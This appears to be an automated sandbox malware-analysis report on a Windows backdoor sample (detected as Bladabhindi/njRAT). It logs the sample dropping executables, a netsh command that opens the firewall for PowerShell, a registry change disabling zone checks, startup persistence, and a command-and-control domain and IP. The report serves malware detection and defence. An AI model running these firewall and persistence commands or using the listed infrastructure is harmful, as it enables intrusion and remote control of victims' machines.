        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKSJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR
        Source: Tr.exeBinary or memory string: WIN_81
        Source: Tr.exeBinary or memory string: WIN_XP
        Source: x.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
        Source: Tr.exeBinary or memory string: WIN_XPe
        Source: Tr.exeBinary or memory string: WIN_VISTA
        Source: Tr.exeBinary or memory string: WIN_7
        Source: Tr.exeBinary or memory string: WIN_8
        Source: Tr.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B36399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00B36399
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B3685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00B3685D
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_00416399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,12_2_00416399
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0041685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_0041685D
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure2
        Valid Accounts
        2
        Native API
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        31
        Disable or Modify Tools
        21
        Input Capture
        2
        System Time Discovery
        Remote Services11
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomains1
        Replication Through Removable Media
        11
        Command and Scripting Interpreter
        2
        Valid Accounts
        1
        DLL Side-Loading
        11
        Deobfuscate/Decode Files or Information
        LSASS Memory11
        Peripheral Device Discovery
        Remote Desktop Protocol21
        Input Capture
        1
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell
        221
        Registry Run Keys / Startup Folder
        2
        Valid Accounts
        2
        Obfuscated Files or Information
        Security Account Manager1
        Account Discovery
        SMB/Windows Admin Shares3
        Clipboard Data
        1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
        Access Token Manipulation
        1
        Software Packing
        NTDS3
        File and Directory Discovery
        Distributed Component Object ModelInput Capture11
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
        Process Injection
        1
        DLL Side-Loading
        LSA Secrets25
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts221
        Registry Run Keys / Startup Folder
        11
        Masquerading
        Cached Domain Credentials13
        Security Software Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Valid Accounts
        DCSync21
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
        Virtualization/Sandbox Evasion
        Proc Filesystem3
        Process Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
        Access Token Manipulation
        /etc/passwd and /etc/shadow11
        Application Window Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
        Process Injection
        Network Sniffing1
        System Owner/User Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        Remote System Discovery
        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465120 Sample: ._cache_1.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 55 Snort IDS alert for network traffic 2->55 57 Multi AV Scanner detection for domain / URL 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 12 other signatures 2->61 7 ._cache_1.exe 5 2->7         started        10 cmd.exe 2->10         started        13 x.exe 2 2->13         started        15 cmd.exe 2->15         started        process3 file4 29 C:\Users\user\AppData\Local\Temp\x.exe, PE32 7->29 dropped 31 C:\Users\user\AppData\Local\Temp\Tr.exe, PE32 7->31 dropped 33 C:\Users\user\...\x.exe:Zone.Identifier, ASCII 7->33 dropped 17 Tr.exe 2 7->17         started        63 Suspicious powershell command line found 10->63 65 Bypasses PowerShell execution policy 10->65 20 powershell.exe 1 10 10->20         started        67 Antivirus detection for dropped file 13->67 69 Multi AV Scanner detection for dropped file 13->69 71 Machine Learning detection for dropped file 13->71 23 Tr.exe 13->23         started        25 powershell.exe 15->25         started        signatures5 process6 dnsIp7 39 Multi AV Scanner detection for dropped file 17->39 41 Binary is likely a compiled AutoIt script file 17->41 43 Machine Learning detection for dropped file 17->43 53 2 other signatures 17->53 35 water-boom.duckdns.org 20->35 37 water-boom.duckdns.org 192.169.69.25, 1177, 49162, 49163 WOWUS United States 20->37 45 Disables zone checking for all users 20->45 47 Uses netsh to modify the Windows network and firewall settings 20->47 49 Modifies the windows firewall 20->49 27 netsh.exe 20->27         started        signatures8 51 Uses dynamic DNS services 35->51 process9

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        ._cache_1.exe81%ReversingLabsWin32.Backdoor.Bladabhindi
        ._cache_1.exe69%VirustotalBrowse
        ._cache_1.exe100%AviraHEUR/AGEN.1321308
        ._cache_1.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1321308
        C:\Users\user\AppData\Local\Temp\Tr.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\Tr.exe81%ReversingLabsWin32.Backdoor.Bladabhindi
        C:\Users\user\AppData\Local\Temp\Tr.exe67%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\x.exe81%ReversingLabsWin32.Backdoor.Bladabhindi
        C:\Users\user\AppData\Local\Temp\x.exe69%VirustotalBrowse
        No Antivirus matches
        SourceDetectionScannerLabelLink
        water-boom.duckdns.org9%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://www.piriform.com/ccleaner0%Avira URL Cloudsafe
        http://www.piriform.com/ccleanerv0%Avira URL Cloudsafe
        http://www.piriform.com/cb0%Avira URL Cloudsafe
        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%Avira URL Cloudsafe
        http://www.piriform.coh0%Avira URL Cloudsafe
        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%VirustotalBrowse
        http://www.piriform.com/ccleaner0%VirustotalBrowse
        http://www.piriform.com/ccleanerv0%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        water-boom.duckdns.org
        192.169.69.25
        truetrueunknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.piriform.com/ccleanerpowershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395332221.000000000039F000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395332221.000000000039F000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.872864488.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.395438531.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        http://www.piriform.com/cbpowershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/powershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://contoso.com/Licensepowershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        http://www.piriform.cohpowershell.exe, 00000004.00000002.871929999.00000000001EE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://contoso.com/Iconpowershell.exe, 00000004.00000002.879192077.00000000127A1000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        192.169.69.25
        water-boom.duckdns.orgUnited States
        23033WOWUStrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1465120
        Start date and time:2024-07-01 10:20:39 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 23s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:14
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:._cache_1.exe
        Detection:MAL
        Classification:mal100.phis.troj.evad.winEXE@14/16@28/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 54
        • Number of non-executed functions: 321
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240s for sample files taking high CPU consumption
        • Exclude process from analysis (whitelisted): WMIADAP.exe, conhost.exe
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        01:21:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk
        04:21:26API Interceptor11131x Sleep call for process: ._cache_1.exe modified
        04:21:38API Interceptor35636x Sleep call for process: powershell.exe modified
        04:21:42API Interceptor3x Sleep call for process: netsh.exe modified
        04:21:57API Interceptor9577x Sleep call for process: x.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        192.169.69.252AE575F006FC418C72A55EC5FDC26BC821AA3929114EE.exeGet hashmaliciousUnknownBrowse
        • http://192.169.69.25/fakeurl.htm
        1F7E9C6AED2B8CB929E3677818BD2B72142254E17F790.exeGet hashmaliciousWSHRATBrowse
        • strserver1.duckdns.org:8001/is-ready
        F4yQKL3fUH.exeGet hashmaliciousUnknownBrowse
        • alphaputin.duckdns.org/og/charly.bin
        orCJlXSGOG.exeGet hashmaliciousUnknownBrowse
        • alphaputin.duckdns.org/og/charly.bin
        PO20171118-COGRAL SPA.jarGet hashmaliciousADWIND WSHRATBrowse
        • pluginsrv1.duckdns.org:7756/is-ready
        New Order_R4.jarGet hashmaliciousADWIND WSHRATBrowse
        • pluginsrv1.duckdns.org:7756/is-ready
        10FCF8DA6000E34F9E8B8B173B6F8A65B6128E2422DB5.exeGet hashmaliciousUnknownBrowse
        • http://192.169.69.25/fakeurl.htm
        66D9612BA9CDE67EDEA09F3482459F3BFE03FAAA13EAD.exeGet hashmaliciousLokibotBrowse
        • ipvhosted.duckdns.org/rmarch/fre.php
        ttmPnejtED.jsGet hashmaliciousWSHRatBrowse
        • pluginsrv.duckdns.org:7744/is-ready
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        WOWUS6f2b0a1890381cd7f98f920e2ecca11d2cc54f0e50c85.exeGet hashmaliciousNjratBrowse
        • 192.169.69.25
        oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
        • 192.169.69.26
        oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
        • 192.169.69.26
        Payment_Copy_Document#474790.jsGet hashmaliciousXWormBrowse
        • 172.93.222.235
        Revised_June_Order_Document#po839203.jsGet hashmaliciousAgentTesla, SugarDump, XWormBrowse
        • 172.93.222.235
        0GdQRdPT2h.exeGet hashmaliciousNanocoreBrowse
        • 192.169.69.26
        https://netfflx-polska.duckdns.org/loga/index_pl.phpGet hashmaliciousUnknownBrowse
        • 192.169.69.26
        http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
        • 192.169.69.26
        http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
        • 192.169.69.26
        http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
        • 192.169.69.26
        No context
        No context
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):6916
        Entropy (8bit):4.765218321768022
        Encrypted:false
        SSDEEP:192:Mxoe5AVFn3eGOVpN6K3bkkjo58gkjDt4iWN3yBGH+dcU6CIVsm5emd:RVoGIpN6KQkj2Lkjh4iUxV
        MD5:665354A1A9139D1FA96E6FCC7F1FCE73
        SHA1:8477F42550FBBA457D4015AAAC889272C7FAF1D8
        SHA-256:146FDB9501A06132126EE69A643DDBF1222DE922D3B59E282BDE97AF5186CD01
        SHA-512:F61A4F30A60A5F63619467D31D928ED428119EB4783ECFA7938A2213B879B3B17DD231389386319F5E756C0CDD075FF5B861646ECFF791D8AD1EA152F2B045CD
        Malicious:false
        Reputation:low
        Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........&.w.....w...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1^.......Test-Path........Limit-EventLog........Show-ControlPanelItem........Get-Content........Rename-
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):64
        Entropy (8bit):0.34726597513537405
        Encrypted:false
        SSDEEP:3:Nlll:Nll
        MD5:446DD1CF97EABA21CF14D03AEBC79F27
        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
        Malicious:false
        Reputation:high, very likely benign file
        Preview:@...e...........................................................
        Process:C:\Users\user\Desktop\._cache_1.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):915456
        Entropy (8bit):6.744106843807966
        Encrypted:false
        SSDEEP:12288:pCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsUBga1T1W+MQ:pCdxte/80jYLT3U1jfsWahI+MQ
        MD5:4D3B21451ED0EE3EE65888D4C8944693
        SHA1:DCFEC58EC8D9D8EC45D0B033DB4462F1DAFE5AB3
        SHA-256:25BC108A683D25A77EFCAC89B45F0478D9DDD281A9A2FB1F55FC6992A93AA830
        SHA-512:5D70915816DC4FA3C83EE6CE5445CB6AEA0421601B38DA04679C1FFED5B980ACF05E8F6E6348FE7BE4907A85679B0A44FF9D95AB076D2E8368D78067860946EC
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        • Antivirus: ReversingLabs, Detection: 81%
        • Antivirus: Virustotal, Detection: 67%, Browse
        Reputation:low
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L.....X..........".................J.............@..........................`............@...@.......@.....................L...|....p...o......................0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....o...p...p..................@..@.reloc..0q.......r..................@..B........................................................................................................................................................................................................................................................................................
        Process:C:\Users\user\Desktop\._cache_1.exe
        File Type:data
        Category:dropped
        Size (bytes):549694
        Entropy (8bit):7.768792119579801
        Encrypted:false
        SSDEEP:12288:2jTK1zAd1HfdTexNnGnZAbwXVSsaoCeFoHiS7fYXk0Qps:2TK1zMHfIrWEw9a/b3gXkH2
        MD5:FBC5F5BB74C7CE2B59F38B8954EF694C
        SHA1:9F5C574C4EC6BE64F7AD25260BFE7593F166E0F4
        SHA-256:3FBAF6860196EDE7B63F3CADABD95FD0A111F2214894C12A5FB0CBB6CE657615
        SHA-512:096BC45CA63CEFF8A6F429CF0786869B87D5A856504C915CD4DE7F04DEA92229AA0010D3536C340F6AF3713FF52A9BA4CA4B8714D3C29B1780F64A509D011342
        Malicious:false
        Reputation:low
        Preview:EA06.........................Z..F@.~......G.P...... 4.l..h........r..d.;...o.H,VY...n.Zm..%>. ...Yt6...."f-s.d.Q/....QJ.w.P..9.).....W..>...".p|`..w.g..+v......[.7p.....D?..>2-.....|d...2p.......^|d..C...........P.. ............@$P.\....w...$..R._.@ .I....K....L.. ...F...p....C.......`.......L.B........G-..........L.0...W..G..>0...)...O....B..|.....[...!...$p.....>....`.\..........?1...<@.?...@.....t....\..R..8......<.u..r.............h`.G.@.\...x.H....0...A....|t .........(4...o...-.......G.P.....@ .........r."z@.\P..h...7...W.....E........?..-p.F..,~..#..$....B.L.Tqt.$..%.z+.E..%.. %@.x.L@.H.........."G..X@..8.....!..~....s...e.+0.90..| ..0.........[..M&........L..K....g....ci.E$. .z1....._......S.b.3>.^.........)..bk.Mz...D15.&.........p..0|....^..).j4....O15..&.L....5S.F.bh..M....Y=. ......1.'}...1..`.1._*......d.+...Q..[x...................<v......w....q8`4......W..h.q.....#........P...bp...4.'g.....5.............\..k...b...6.P..@k..[...}.......b..
        Process:C:\Users\user\AppData\Local\Temp\x.exe
        File Type:data
        Category:dropped
        Size (bytes):549694
        Entropy (8bit):7.768792119579801
        Encrypted:false
        SSDEEP:12288:2jTK1zAd1HfdTexNnGnZAbwXVSsaoCeFoHiS7fYXk0Qps:2TK1zMHfIrWEw9a/b3gXkH2
        MD5:FBC5F5BB74C7CE2B59F38B8954EF694C
        SHA1:9F5C574C4EC6BE64F7AD25260BFE7593F166E0F4
        SHA-256:3FBAF6860196EDE7B63F3CADABD95FD0A111F2214894C12A5FB0CBB6CE657615
        SHA-512:096BC45CA63CEFF8A6F429CF0786869B87D5A856504C915CD4DE7F04DEA92229AA0010D3536C340F6AF3713FF52A9BA4CA4B8714D3C29B1780F64A509D011342
        Malicious:false
        Reputation:low
        Preview:EA06.........................Z..F@.~......G.P...... 4.l..h........r..d.;...o.H,VY...n.Zm..%>. ...Yt6...."f-s.d.Q/....QJ.w.P..9.).....W..>...".p|`..w.g..+v......[.7p.....D?..>2-.....|d...2p.......^|d..C...........P.. ............@$P.\....w...$..R._.@ .I....K....L.. ...F...p....C.......`.......L.B........G-..........L.0...W..G..>0...)...O....B..|.....[...!...$p.....>....`.\..........?1...<@.?...@.....t....\..R..8......<.u..r.............h`.G.@.\...x.H....0...A....|t .........(4...o...-.......G.P.....@ .........r."z@.\P..h...7...W.....E........?..-p.F..,~..#..$....B.L.Tqt.$..%.z+.E..%.. %@.x.L@.H.........."G..X@..8.....!..~....s...e.+0.90..| ..0.........[..M&........L..K....g....ci.E$. .z1....._......S.b.3>.^.........)..bk.Mz...D15.&.........p..0|....^..).j4....O15..&.L....5S.F.bh..M....Y=. ......1.'}...1..`.1._*......d.+...Q..[x...................<v......w....q8`4......W..h.q.....#........P...bp...4.'g.....5.............\..k...b...6.P..@k..[...}.......b..
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
